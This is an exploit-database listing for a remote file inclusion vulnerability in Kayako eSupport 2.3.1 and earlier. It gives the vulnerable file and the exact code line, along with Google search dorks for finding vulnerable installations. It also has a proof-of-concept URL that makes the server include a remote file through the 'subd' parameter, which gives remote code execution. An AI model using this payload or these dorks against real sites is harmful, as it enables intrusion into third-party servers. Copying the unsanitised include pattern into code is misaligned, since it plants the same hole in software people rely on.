[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-637
Category
web applications
Date add
01-08-2006
Platform
unsorted
===================================================================
Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability
===================================================================



Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

[code]
require_once $subd . "functions.php";
[/code]

Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?



#  0day.today [2024-11-15]  #